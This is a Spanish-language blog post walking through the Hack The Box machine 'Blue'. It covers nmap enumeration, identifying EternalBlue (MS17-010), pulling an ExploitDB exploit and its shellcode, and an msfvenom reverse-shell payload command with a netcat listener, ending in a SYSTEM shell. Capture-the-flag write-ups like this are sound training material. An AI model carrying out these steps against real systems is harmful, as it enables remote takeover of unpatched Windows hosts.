Full width home advertisement

Post Page Advertisement [Top]

 

 

Blue es una de las máquinas más sencillas de Hack The Box. Pero demuestra el impacto que tuvo la vulnerabilidad de EternalBlue, que se ha utilizado para comprometer a muchas empresas a nivel global a través de distintos ataques de ransomware.

 

Para empezar la máquina es realizar un reconocimiento y enumeración, para ello utilizaremos nmap que nos devolverá una primera lista de puertos abiertos



Teniendo los puertos abiertos identificados indagaremos un poco más sobre estos utilizando la opción -A en nmap



El anterior escaneo podemos ver que se trata de un sistema Windows 7 Profesional, con el puerto 445 smb con nmap y la opción --script vuln haremos un rápido análisis para ver si es vulnerable a algún ataque



Después de esto vemos que es la vulnerabilidad de EternalBlue (MS17-010), en ExploitDB encontramos el siguiente exploit compatible con el sistema auditado (https://www.exploit-db.com/exploits/42031)



Para este exploit necesitaremos el siguiente shellcode (https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42030.asm)



Con el shellcode descargado con nasm -f bin lo ensambla en un archivo binario


 

Después generaremos nuestro payload mediante msfvenom  -p windows/x64/shell_reverse_tcp lhost=IP lport=PUERTO -f raw -o payload.bin



Con estos 2 archivos procederemos a juntarlo esto lo podemos hacer mediante cat de la siguiente forma:



Con este nuevo archivo exploit.bin, procederemos a lanzar nuestro exploit para la vulenrabilidad de EternalBlue, para ello debemos indicar la ip y el archivo bin generado.

Nota: Antes de lanzar este exploit debemos tener un netcat a la escucha con el puerto indicado anteriormete en el comando de msfvenom



Una vez lanzado el exploit nos abrira una nueva shell sobre la máquina como usuario SYSTEM por lo que tendremos control total sobre la máquina



La primera flag de la máquina la encontraremos en c:\Users\haris\Desktop\user.txt


La segunda flag de root c:\Users\Administrator\Desktop\root.txt


 

Como podeis ver es un máquina bastante sencilla, donde explotamos un vulnerabilidad que ha sido tan importante como Eternalblue.

Espero que os haya gustado, nos vemos en próximo post

Saludos!



Tags: , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)

Bottom Ad [Post Page]

Copyright 2021, MesQ. All rights Reserved.